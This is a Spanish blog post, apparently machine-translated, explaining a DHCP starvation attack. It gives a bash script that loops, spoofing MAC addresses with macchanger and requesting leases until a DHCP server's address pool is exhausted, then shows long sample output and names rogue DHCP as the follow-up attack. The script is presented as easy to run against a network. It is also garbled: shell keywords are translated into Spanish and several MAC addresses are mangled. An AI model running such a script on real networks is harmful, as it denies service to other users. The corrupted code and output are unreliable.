viernes, 29 de enero de 2016

En que consiste un ataque "DHCP starvation"

Un ataque "DHCP hambre" Trata de inundar con Peticiones "DHCP_REQUEST" DHCP Servidor al, Y falsas con la ayuda de Direcciones MAC, párr · intentar agotar su espacio de Direcciones asignables. El Objetivo es Que El Servidor DHCP no Pueda respondedor una Otros Clientes y poder Realizar Otros Tipos de Ataques (rogue DHCP). 




Realmente ESTAMOS hablandos de Un tipo de ataque muy Efectivo y Fácil de Realizar. Unicamente DEBEMOS Tener dhclient y macchanger instalados en La Máquina, y Con el guión siguiente, Podremos reproducirlo Problemas pecado:



sh -v starve.sh 

#! / bin / bash



mientras que la verdadera; hacer

# Matar a todos los clientes DHCP que ejecutan - por si acaso

killall dhclient

rm -f /var/run/dhclient.pid



# Derribar la interfaz

ifconfig eth0 down



# Cambiar la dirección MAC de la interfaz e imprimir la nueva dirección MAC

macchanger -a eth0 2> & 1 | grep Faked



# Trae la interfaz hasta

ifconfig eth0



# Hacer un nuevo contrato de arrendamiento de DHCP

eth0 dhclient 2> & 1 | grep DHCPACK

hecho

Falsificada MAC: 00: 10: a8: 19: ef: 88 (Reliance Computer Corp.)

DHCPACK de 192.168.0.101 desde 192.168.0.1

MAC falsa: 00: 0c: 5c: cd: fa: df (Sistemas GTN Bv)

DHCPACK de 192.168.0.102 desde 192.168.0.1

Falsificada MAC: 00: 09: e6: 46: 45: f3 (Ciber conmutación Inc.)

DHCPACK de 192.168.0.103 desde 192.168.0.1

MAC falsa: 00: 0d: f1: 7b: 03: 1c (Ionix Inc.)

DHCPACK de 192.168.0.104 desde 192.168.0.1

Falsificada MAC: 00: 09: 63: e4: c5: 14 (Dominio Lasercom Inc.)

DHCPACK de 192.168.0.105 desde 192.168.0.1

MAC falsa: 00: 10: d6: 45: 8b: 59 (Itt - A / cd)

DHCPACK de 192.168.0.106 desde 192.168.0.1

MAC falsa: 00: a0: 8b: 4b: 90: ae (Aston Electronic Designs Ltd.)

DHCPACK de 192.168.0.107 desde 192.168.0.1

Falsificada MAC: 00: 50: b6: 9c: 26: 79 (. Buen Camino Ind Co., Ltd.)

DHCPACK de 192.168.0.108 desde 192.168.0.1

Falsificada MAC: 00: 30: 44: 59: 60: 85 (Portsmith Llc)

DHCPACK de 192.168.0.109 desde 192.168.0.1

MAC falsa: 00: 10: 6e: 2d: 70: 7a (. Tadiran Com Ltd.)

DHCPACK de 192.168.0.110 desde 192.168.0.1

MAC falsa: 00: 90: 2c: 96: f1: 77 (Datos y Control Equipment Ltd.)

DHCPACK de 192.168.0.111 desde 192.168.0.1

MAC falsa: 00: 20: cc: dd: 04: 91 (Digital Services, Ltd.)

DHCPACK de 192.168.0.112 desde 192.168.0.1

MAC falsa: 00: 0F: 0d: e0: 60: ae (Hunt Electronic Co., Ltd.)

DHCPACK de 192.168.0.113 desde 192.168.0.1

Falsificada MAC: 00: 80: 39: ba: 9d: 42 (Alcatel Stc Australia)

DHCPACK de 192.168.0.114 desde 192.168.0.1

MAC falsa: 00: 30: d8: 1e: d4: aa (Sitek)

DHCPACK de 192.168.0.115 desde 192.168.0.1

MAC falsa: 00: 01: ser: 3e: ac: c1 (GigaLINK Co., Ltd.)

DHCPACK de 192.168.0.116 desde 192.168.0.1

MAC falsa: 00: 80: 9 sexies: 81: c9: cf (Datus Gmbh)

DHCPACK de 192.168.0.117 desde 192.168.0.1

MAC falsa: 00: 80: f2: f4: 3e: 39 (Raycom Systems Inc)

DHCPACK de 192.168.0.118 desde 192.168.0.1

MAC falsa: 00: 0e: 1e: c3: c8: 19 (Privado)

DHCPACK de 192.168.0.119 desde 192.168.0.1

Falsificada MAC: 00: 40: 35: 90: 91: 9 sexies (Opcom)

DHCPACK de 192.168.0.120 desde 192.168.0.1

Falsificada MAC: 00: 80: 24: ad: fb: d9 (Kalpana, Inc.)

DHCPACK de 192.168.0.121 desde 192.168.0.1

MAC falsa: 00: e0: ee: b5: 4f: 15 (Marel Hf)

DHCPACK de 192.168.0.122 desde 192.168.0.1

Falsificada MAC: 00: 50: 03: 17: 23: 47 (Gretag Macbeth Ag)

DHCPACK de 192.168.0.123 desde 192.168.0.1

MAC falsa: 00: e0: ef: 28: db: 37 (Dionex)

DHCPACK de 192.168.0.124 desde 192.168.0.1

MAC falsa: 00: 0F: a5: ba: 1f: 1d (SMP / Bwa Technology GmbH)

DHCPACK de 192.168.0.125 desde 192.168.0.1

MAC falsa: 00: 08: 1e: 5a: e3: d9 (Repeatit Ab)

DHCPACK de 192.168.0.126 desde 192.168.0.1

Falsificada MAC: 00: 0e: 52: 7f: eb: c5 (Optium Corporation)

DHCPACK de 192.168.0.127 desde 192.168.0.1

Falsificada MAC: 00: 50: 10: b6: f1: f0 (Novanet Learning, Inc.)

DHCPACK de 192.168.0.128 desde 192.168.0.1

Falsificada MAC: 00: 04: 2a: 14: 14: 11 (Redes inalámbricas, Inc.)

DHCPACK de 192.168.0.129 desde 192.168.0.1

Falsificada MAC: 00: 60: b2: 49: 66: ac (Control de Procesos Corp.)

DHCPACK de 192.168.0.130 desde 192.168.0.1

Falsificada MAC: 00: a0: 44: 14: 5e: 8a (NTT Es Co., Ltd.)

DHCPACK de 192.168.0.131 desde 192.168.0.1

Falsificada MAC: 00: 90: f5: 06: 6d: f3 (Clevo Co.)

.

.

.

.

DHCPACK de 192.168.0.196 desde 192.168.0.1

Fingido MAC: 00: 30: 40: a3: d0: 37 (Cisco Systems, Inc.)

DHCPACK de 192.168.0.197 desde 192.168.0.1

Falsificada MAC: 00: 20: 94: 9 sexies: c7: 32 (Cubix Corporation)

DHCPACK de 192.168.0.198 desde 192.168.0.1

Falsificada MAC: 00: 40: 9d: f9: 15: 13 (Digiboard, Inc.)

Falsificada MAC: 00: 05: 0d: 10: 15: 2f (Midstream Technologies, Inc.)

Falsificada MAC: 00: 0d: 3c: 7e: ea: 92 (I.tech dinámico Ltd)

Falsificada MAC: 00: 07: dc: 51: c3: e9 (Atek Co, Ltd)

Falsificada MAC: 00: 02: 18: 3c: 73: cb (Advanced Scientific Corp)


Fuentes:


No hay comentarios:

Publicar un comentario